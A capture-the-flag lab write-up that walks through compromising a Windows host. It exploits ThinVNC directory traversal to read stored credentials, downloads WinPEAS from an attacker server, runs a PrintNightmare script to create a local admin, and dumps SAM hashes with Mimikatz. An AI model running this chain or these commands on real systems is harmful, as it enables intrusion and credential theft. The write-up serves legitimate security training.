**This is a room to teaches the basic of exploiting a Windows system. It covers from initial foothold to privilege escalation.**
# Initial Recon
- Windows usually doesn't respond to pings so we won't know if the host is up if we try to ping it.
- The room uses NMAP but we'll use a faster port scanner which is RustScan.
- The beauty of RustScan is that it can run any NMAP commands too.
```bash
$ rustscan -a 10.10.195.75  -- -sCV -Pn
```
```txt
PORT     STATE    SERVICE
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
8080/tcp open http-proxy
```

# Service Enumeration
- Now we can run the scan again but this time with `-sV` tag (`-sC too if you want to run default scripts`) to see what we can do with them. 
```bash
$ rustscan -a 10.10.221.167 -p 3389,7680,8080 -- -sCV -Pn
```
```txt
PORT     STATE SERVICE       REASON  VERSION
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: GAIA
|   NetBIOS_Domain_Name: GAIA
|   NetBIOS_Computer_Name: GAIA
|   DNS_Domain_Name: GAIA
|   DNS_Computer_Name: GAIA
|   Product_Version: 10.0.17763
|_  System_Time: 2021-09-30T06:34:45+00:00
| ssl-cert: Subject: commonName=GAIA
| Issuer: commonName=GAIA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-08-29T20:56:26
| Not valid after:  2022-02-28T20:56:26
| MD5:   4f8e 1595 0ddf 896b f328 382c 74e1 4757
| SHA-1: 0487 ba8b 71a7 25e4 861d 29bd 0dba dde0 8f63 5038
| -----BEGIN CERTIFICATE-----
| MIICzDCCAbSgAwIBAgIQUMxZ1WSDRaRHMk1jQH2EHzANBgkqhkiG9w0BAQsFADAP
| MQ0wCwYDVQQDEwRHQUlBMB4XDTIxMDgyOTIwNTYyNloXDTIyMDIyODIwNTYyNlow
| DzENMAsGA1UEAxMER0FJQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
| AMFiXWfKB/B0VcofnYBW/8XnUhE5Y659HIJia9Bk5nlG6g9otdGGSktBPGbP6RtX
| TuvWYRdmcIMSgiN66yb6Ow62eVVkdSC2vTP6Lc7FzB/Knm7Liud7TBjsWI1y/I4l
| WsdFnLiZo8yDP+q4WRpHivdrPVGOzuMpMNh7V1sj7k9WToOyHWVWPIhPERdsfHqn
| 1fwAaqGhu0CF7XMhrutMBwJgSzNlTItuYnSPB6dlqBFabVSZpusPc0liTrDg4Q7n
| O9p6ous1W008+zH1V9g+Tp6WDRhDVcLTMv90R2K6dvrLnhVkx5XZzf1AWqiLX7Fa
| xahHm9cJ7WVwYBTV5OZAfGkCAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEw
| CwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IBAQBzm8kaotMsW9jzDEtKVVEE
| JahZ+2m09iz6Gn139yz/+mCb62DbnWlGFg1+EbK4T2tvdQKpL+d7zBX9tjSwme8G
| 4RvO+NrrqMuNCdZzgjRIEajgPK9pA+KdtiLW1IwuPHRCvXWPAJ3nTNvU24DaqpxQ
| vF7UPvSiVtEXZ4hCY4GWr9Zb9YDRcjBeyNIMURVkfvOB6c2ty7PxSjxi1oEzXiq/
| IgHS+uYfrpGyB4eQm3DStUkYW3sbmWhEwC9inixHQBnxjmri8s9F+qsAFqpXFaRL
| ycsKZ3Quxgdk8abypg1VmsLEasRHQww0c8JGQKcPCKK5duCC/SJsALa1c/kqrj34
|_-----END CERTIFICATE-----
|_ssl-date: 2021-09-30T06:34:52+00:00; +2s from scanner time.
7680/tcp open  pando-pub?    syn-ack
8080/tcp open  http-proxy    syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Type: text/html
|     Content-Length: 177
|     Connection: Keep-Alive
|     <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
|   GetRequest: 
|     HTTP/1.1 401 Access Denied
|     Content-Type: text/html
|     Content-Length: 144
|     Connection: Keep-Alive
|     WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="nc7Zu6i25UBI10gCqLblQA==", opaque="iCrNkrFxLGUeQVEnypR7MrCcgvL2mgZ4hG"
|_    <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
| http-auth: 
| HTTP/1.1 401 Access Denied\x0D
|_  Digest nonce=sorpxai25UCI20gCqLblQA== opaque=mKxkXZrGukAmFh0RQJnFrubKhjaBaagm4R qop=auth realm=ThinVNC
|_http-favicon: Unknown favicon MD5: CEE00174E844FDFEB7F56192E6EC9F5D
| http-methods: 
|_  Supported Methods: GET POST
|_http-title: 401 Access Denied
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.91%I=7%D=9/30%Time=61555A1F%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,179,"HTTP/1\.1\x20401\x20Access\x20Denied\r\nContent-Type:\x20
SF:text/html\r\nContent-Length:\x20144\r\nConnection:\x20Keep-Alive\r\nWWW
SF:-Authenticate:\x20Digest\x20realm=\"ThinVNC\",\x20qop=\"auth\",\x20nonc
SF:e=\"nc7Zu6i25UBI10gCqLblQA==\",\x20opaque=\"iCrNkrFxLGUeQVEnypR7MrCcgvL
SF:2mgZ4hG\"\r\n\r\n<HTML><HEAD><TITLE>401\x20Access\x20Denied</TITLE></HE
SF:AD><BODY><H1>401\x20Access\x20Denied</H1>The\x20requested\x20URL\x20\x2
SF:0requires\x20authorization\.<P></BODY></HTML>\r\n")%r(FourOhFourRequest
SF:,111,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html\r\
SF:nContent-Length:\x20177\r\nConnection:\x20Keep-Alive\r\n\r\n<HTML><HEAD
SF:><TITLE>404\x20Not\x20Found</TITLE></HEAD><BODY><H1>404\x20Not\x20Found
SF:</H1>The\x20requested\x20URL\x20nice%20ports%2C/Tri%6Eity\.txt%2ebak\x2
SF:0was\x20not\x20found\x20on\x20this\x20server\.<P></BODY></HTML>\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
```
- Now that's a lot of output, but don't worry we'll take a look at them slowly.

## Port 3389
```bash
PORT     STATE SERVICE       REASON  VERSION
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
```
- Okay we have basically a RDP server that we can use to connect remotely. Not that useful since we don't have any credentials.

## Port 7680
```bash
7680/tcp open  pando-pub?    syn-ack
```
- Okay NMAP too is unsure what service is this. We can leave this for now

## Port 8080
```bash
8080/tcp open  http-proxy    syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Type: text/html
|     Content-Length: 177
|     Connection: Keep-Alive
|     <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
|   GetRequest: 
|     HTTP/1.1 401 Access Denied
```
- Okay so this is a HTTP server, and we're getting a 401 on a GetRequest. Let's try to visit that to confirm. 
- The site is asking for a username and password through Basic Authentication.
- Not much information, let's curl it with verbose mode on.
```http
*   Trying 10.10.221.167:8080...
* Connected to 10.10.221.167 (10.10.221.167) port 8080 (#0)
> GET / HTTP/1.1
> Host: 10.10.221.167:8080
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Access Denied
< Content-Type: text/html
< Content-Length: 144
< Connection: Keep-Alive
< WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="Qxf77ai25UDI5EgCqLblQA==", opaque="ZfsAF7S1mPoeb8GEEGGSyICRTRyalhtwk7"
< 
<HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL  requires authorization.<P></BODY></HTML>
* Connection #0 to host 10.10.221.167 left intact
```
- First part is a our request, while the second part is the the request. We see an interesting service which is ThinVNC
- Let's do some research on google if there is an exploit to bypass the authentication
```txt
exploitdb thinvnc auth bypass
```
- And we get this [exploit on exploitDB](https://www.exploit-db.com/exploits/47519)

# Foothold
- Now now before running any exploits, let's read through what it does first. (**Important if you're doing a pentest**)
```py
def exploit(host,port):
    url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
    r = requests.get(url)
    body = r.text
    print(body.splitlines()[2])
    print(body.splitlines()[3])
```
It's trying to reach an endpoint, but does it exist? Let's try to curl that
```bash
curl http://10.10.221.167:8080/xyz/../../ThinVnc.ini -v

< HTTP/1.1 404 Not Found
< Content-Type: text/html
< Content-Length: 153
< Connection: Keep-Alive
```
- We get a 404, so it doesn't exist. Let's run it anyway to see what happens.
```py
IndexError: list index out of range
```
- We get an error because we don't actually get the request. That's fine let's look at other exploits.
- We can search for the CVE number which is CVE-2019-17662
- After a while I found this compilation of the [exploits](https://vulmon.com/vulnerabilitydetails?qid=CVE-2019-17662)
- There is a Metasploit module for this but let's use [this one by Muirland](https://github.com/MuirlandOracle/CVE-2019-17662) which is provided on the room and the on Vulmon.
- Again please read what the exploit does.
```py
 def exploit(self):
        url = f"""{"https" if self.args.ssl else "http"}://{self.args.host}:{self.args.port}/abc/../{self.args.file}"""
        req = requests.Request(method="GET", url=url)
        prep = req.prepare()
        prep.url = url
        try:
            r = self.s.send(prep, timeout=3)
        except requests.exceptions.ConnectTimeout:
            self.colours.print("fail", f"Could not connect to the target ({self.args.host}:{self.args.port})")
        except KeyboardInterrupt:
            self.colours.print("info", "Exiting...")
            return
        except:
            self.colours.print("fail", f"Could not connect to target: {self.args.host}")

        if r.status_code != 200:
            self.colours.print("fail", "Error retrieving file")
        
        if self.args.file != "../ThinVnc.ini":
            self.colours.print("success", f"Retrieved file ({self.args.file}):")
            print(r.text)
            return

        creds = re.findall("(?:User|Password)=([^\r]*)", r.text)
        if len(creds) < 2:
            self.colours.print("fail", "Unable to retrieve credentials")
        self.colours.print("success", "Credentials Found!")
        print(f"""Username:\t{creds[0]}\nPassword:\t{creds[1]}\n\n""")
```
- So the exploit is exploiting directory traversal and read the file. So this looks safe to run for us.
- Let's run with the default file first.
```bash
[+] Credentials Found!
Username:	Atlas
Password:	H0ldUpTheHe@vens
```
- We found credentials to login.
- Now ThinVNC allows us to connect to a machine, but RDP through a web is kinda slow. 
- Let's try to login with the credentials using a software like `Remmina`.
- And it accepts our credentials and we have access.

# Privilege Escalation
- Windows exploitation is quite hard than Linux for me, but we'll get through this together.
- We can run a few enumeration scripts like Winpeas.
- Now, if your familiar with `wget` in Linux there is a `wget` too in Powershell. 
- But I like to use `Invoke-WebRequest` to download files from my attacker server. Let's send the script over.
```ps
Invoke-WebRequest -Uri http://10.17.1.163:9090/winPEASany.exe -OutFile winpeas.exe
```
- Okay so the latest vulnerability for Windows is PrinterNightmare which is CVE-2021-34527. Let's try an exploit made by [John Hammond](https://github.com/JohnHammond/CVE-2021-34527)
- Spooler service is running if we view it on Task Manager.
- Now let's send the script over.
```ps
PS C:\Users\Atlas\Desktop> Import-Module .\printer.ps1
PS C:\Users\Atlas\Desktop> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll
```
- Okay so we have to Import it first and then we can use it cmdlets.
- We created user `adm1n` with `P@ssw0rd` as the password and added it to Local Administrator.
- Now let's exit RDP and re-login with our new credentials! 
- Now let's run a command to see our list of groups.
```ps
C:\Users\adm1n>whoami /groups
BUILTIN\Administrators
Mandatory Label\Medium Mandatory Level
```
- These are two are very interesting, this means that we have full access to the machine. If you're not sure what it means just google it!

# Post Exploit
- Now that we have admin privileges, what we should do.
1. We should get the hashes for the administrator
2. We can network around to see if there is any machines connecting.

## Mimikatz
- If you don't have mimikatz in your scripts, get them [here](https://github.com/gentilkiwi/mimikatz/releases)
- Now send the `mimimkatz.exe` over to the victim.
- I'm not that good with Windows exploitation so I'm following the room.
- Before dumping hashes, we need to run 2 commands.
1. `privilege::debug` obtains debug privilege
2. `token::elevate` puts us in administrative shell with high privileges.

```ps
mimikatz # privilege::debug
Privilege '20' OK
```
- If you don't get that message, make sure you're running powershell as administrator!
- 
```ps
mimikatz # lsadump::sam
Domain : GAIA
SysKey : 36c8d26ec0df8b23ce63bcefa6e2d821
Local SID : S-1-5-21-1966530601-3185510712-10604624

SAMKey : 6e708461100b4988991ce3b4d8b1784e

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: c164449[REDACTED]67af7eea7e420b65c8c3eb
```
-It'll dump a lot of information, but don't fret! We're interested in the hashes!
- Now we fully compromised the machine!







